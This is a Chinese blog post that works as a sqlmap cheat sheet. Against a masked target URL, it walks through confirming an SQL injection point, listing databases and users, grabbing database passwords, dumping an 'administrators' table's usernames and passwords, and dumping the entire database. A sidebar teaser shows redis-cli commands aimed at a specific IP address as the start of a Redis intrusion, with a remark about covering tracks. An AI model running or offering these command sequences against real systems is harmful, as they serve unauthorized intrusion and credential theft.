当前位置:首页 > 文章 > 正文内容

sqlmap基础命令

admin4年前 (2021-01-16)文章3967

检查注入点是否可用

sqlmap -u “http://www.******.com/subcat.php?id=2” --batch

暴库,看看都有哪些数据库:

#sqlmap -u   --dbs

找出web当前使用的是哪个数据库:

#sqlmap -u http://www.******.com/subcat.php?id=2 --current-db

找出web当前数据库的账户

#sqlmap -u http://www.******.com/subcat.php?id=2 --current-user

列出数据库所有用户:

#sqlmap -u http://www.******.com/subcat.php?id=2 --users

获取数据库账户与密码:

#sqlmap -u http://www.******.com/subcat.php?id=2 --passwords

获取当前数据库的所有表:

#sqlmap -u http://www.******.com/subcat.php?id=2 -D bible_history --tables

-D  指定数据库

找出表中都有哪些字段:

#sqlmap -u http://www.******.com/subcat.php?id=2 -D bible_history -T administrators --columns

-T 指定表

爆字段内容:

#sqlmap -u http://www.******.com/subcat.php?id=2 -D bible_history -T administrators -C admin_first_name,admin_id,admin_last_name,admin_password,admin_username --dump

 -C:指定字段

 --dump:导出,否则shell上不会显示内容,只能到日志中查看

若内容太多,可以指定显示那一部分:

 --start:指定导出的开始的行

 --stop:指定导出结束的行

#sqlmap -u http://www.******.com/subcat.php?id=2 -D bible_history -T administrators -C admin_first_name,admin_id,admin_last_name,admin_password,admin_username --start 1 --stop 10 --dump

拖库:

#sqlmap -u http://www.******.com/subcat.php?id=2 --dump-all


扫描二维码推送至手机访问。

版权声明:本文由Mpg blog发布,如需转载请注明出处。

分享给朋友:

相关文章

智能DIY官网程序远程附件修复

1.0.73问题:多用户不能独立设置远程附件配置。修改文件lf_bddiy/core/modules/admin/models/core_setting/AttachmentConfigModel.p...

redis渗透获取权限

KALIredis-cli -h 189.174.86.173//运行并复制相关参数,完事了搽屁股config get dir config get dbfilename//开始 设置网站目...

免费的网络短剧网站!

免费的网络短剧网站!

短剧全免费,没有广告,不付费,贼爽给你们更新部分网络短剧的名称,如果找不到,还可以自己去搜索“免费短剧”https://www.r100.cc《昨夜星辰又逢君》《漂亮后妈甜翻全家(我才不会喜欢他))《...

禾匠老版本提示“鉴权失败,请传入正确的key”

禾匠老版本提示“鉴权失败,请传入正确的key”

由于腾讯地图的key是写死的,所以需要手动进行修改:先申请一个自己的key备用(https://lbs.qq.com/)\views\components\app-map.php  ...

免费短剧网站分享给大家,每天都在更新,上千部短剧,推荐收藏!

《腹黑千金的秘密(黑玫瑰)》(79集)《被开除后我成了冒牌神尊》(79集)《陛下臣真不会修仙》(77集)《全世界都知道我爱你》(70集)《星辰永不坠落》(63集)《风起时想你(咬定嫣嫣不放松) 》(5...

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。